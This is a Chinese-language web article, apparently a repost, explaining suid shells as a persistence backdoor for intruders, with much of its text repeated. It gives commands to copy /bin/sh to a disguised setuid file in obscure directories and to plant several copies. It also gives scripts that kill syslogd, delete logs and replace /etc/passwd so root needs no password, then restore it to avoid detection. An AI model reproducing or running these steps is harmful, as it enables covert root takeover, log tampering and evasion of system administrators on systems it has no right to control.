ndv0167网盘:什么是Suid shell?

来源:百度文库 编辑:杭州交通信息网 时间:2024/05/10 09:06:17

什么是Suid Shell?

Suid shell是一种可用于以拥有者权限运行的shell。也就是说,如果拥有者
是root,那你就可能以root的
身份执行命令。普通的shell文件属性为rwxr-xr-x,拥有者为root,root可读/写
/执行这个shell,而其他用户
则只能以自己的权限读和运行它。然而,如果有一个文件属性为rwsr-xr-x的she
ll,就可以获得文件拥有者权
限;如果文件拥有者是root,那么任何运行了这个shell的用户便可以控制整个系
统,如增加用户、修改root口
令、清除日志等等。

为什么需要它?

这是一个非常容易回答的问题。当通过某些方法进入系统后,如果系统管理
员有一定的水平,会很快发现
问题。通常他们会查看日志和修改root口令,你可能就要跟这个系统说再见了。

这就是需要suid shell的原因 。:)

怎样才能得到suid shell呢?

首先你要足够狡猾,这取决于你面对的是什么样的系统管理员。当你用尽一
切方法,如猜口令、苦难root 、
安全漏洞攻击等等,终于成功地取得了root权限,尽快找到一个几乎从未使用过
的目录。无论如何,不要将
suid shell放在你的主目录下。一个比较好的地方是/usr下的深层子目录,如/u
sr/X11/include/X11/。这个目
录几乎不会有人进去的,而且很少会因存放过多文件而使系统管理员检查里面的
文件。另外,suid shell的名
字应该尽量与其它文件相似。例如,在这个目录下有sync.h、shape.h等文件,s
uid shell可以取part.h这种隐
蔽性较好的名字。

另一个比较好的地方是将suid shell与其它suid程序放置在一起,如/usr/s
bin,并同样取一个隐蔽的名字。

接着,就是在这些目录下创建suid shell了。如:

cp /bin/sh /usr/X11/include/X11/extensions/part.h
chmod 4755 /usr/X11/include/X11/extensions/part.h

注意,为了使整个过程在最短的时间内完成,应该在进入系统前做好相应准
备。最好在尝试攻击前仔细研
究系统和计划。另外总是多创建几个suid shell,这样即使其中一个被发现了,
仍然有通过使用其它
suid shell控制系统的机会。

如何利用suid shell呢?

在许多系统中,往往限制用户所能使用的shell。这个只要检查一下/etc下的
相应文件就能知道。在Linux
系统中这个文件是/etc/shells,其中列出了所有的shell程序。但你可以用suid
shell做任何事!例如,你准
备将/etc/passwd改名为/etc/passwd.heh,编写如下脚本即可:

#!/usr/X11/include/X11/extensions/part.h

mv /etc/passwd /etc/passwd.heh
exit

(这只是个示例,最好别这样做:))
上面的例子好象只提供了一个非交互的程序,但只要精心编写脚本,同样可
以实现虚拟的“交互”程序。

Suid shell是一种可用于以拥有者权限运行的shell。也就是说,如果拥有者是root,那你就可能以root的身份执行命令。普通的shell文件属性为rwxr-xr-x,拥有者为root,root可读/写/执行这个shell,而其他用户则只能以自己的权限读和运行它。然而,如果有一个文件属性为rwsr-xr-x的shell,就可以获得文件拥有者权限;如果文件拥有者是root,那么任何运行了这个shell的用户便可以控制整个系统,如增加用户、修改root口令、清除日志等等。
为什么需要它?
   这是一个非常容易回答的问题。当通过某些方法进入系统后,如果系统管理员有一定的水平,会很快发现问题。通常他们会查看日志和修改root口令,你可能就要跟这个系统说再见了。这就是需要suid shell的原因 。:)

怎样才能得到suid shell呢?
   首先你要足够狡猾,这取决于你面对的是什么样的系统管理员。当你用尽一切方法,如猜口令、苦难root 、安全漏洞攻击等等,终于成功地取得了root权限,尽快找到一个几乎从未使用过的目录。无论如何,不要将suid shell放在你的主目录下。一个比较好的地方是/usr下的深层子目录,如/usr/X11/include/X11/。这个目录几乎不会有人进去的,而且很少会因存放过多文件而使系统管理员检查里面的文件。另外,suid shell的名字应该尽量与其它文件相似。例如,在这个目录下有sync.h、shape.h等文件,suid shell可以取part.h这种隐蔽性较好的名字。
   另一个比较好的地方是将suid shell与其它suid程序放置在一起,如/usr/sbin,并同样取一个隐蔽的名字。

  接着,就是在这些目录下创建suid shell了。如:

cp /bin/sh /usr/X11/include/X11/extensions/part.h
chmod 4755 /usr/X11/include/X11/extensions/part.h

   注意,为了使整个过程在最短的时间内完成,应该在进入系统前做好相应准备。最好在尝试攻击前仔细研究系统和计划。另外总是多创建几个suid shell,这样即使其中一个被发现了,仍然有通过使用其它suid shell控制系统的机会。

  如何利用suid shell呢?

  在许多系统中,往往限制用户所能使用的shell。这个只要检查一下/etc下的相应文件就能知道。在Linux系统中这个文件是/etc/shells,其中列出了所有的shell程序。但你可以用suid shell做任何事!例如,你准备将/etc/passwd改名为/etc/passwd.heh,编写如下脚本即可:

#!/usr/X11/include/X11/extensions/part.h

mv /etc/passwd /etc/passwd.heh
exit
(这只是个示例,最好别这样做:))
上面的例子好象只提供了一个非交互的程序,但只要精心编写脚本,同样可以实现虚拟的“交互”程序。

如果你仍然想真正得到可交互的访问,请阅读以下内容。

首先将/etc/passwd复制到主目录下,编辑它以删除root的加密口令。接着输入"ps ax|grep syslog\'取得syslogd的进程号。现在以\'interactive XX\'(XX是syslogd的进程号)格式运行如下脚本:

#!/usr/X11/include/X11/extensions/part.h

kill -9 $1
rm -f /var/adm/syslog
cp /etc/passwd /etc/passwd.OLD
cp ~backend/passwd /etc/passwd
chmod 644 /etc/passwd
exit

  现在可以无须口令就成为root了
  一旦完成所要做的”工作“后,记住运行如下脚本,替换回最初的口令文件。

#!/usr/X11/include/X11/extensions/part.h

cp /etc/passwd.OLD /etc/passwd
chmod 644 /etc/passwd
exit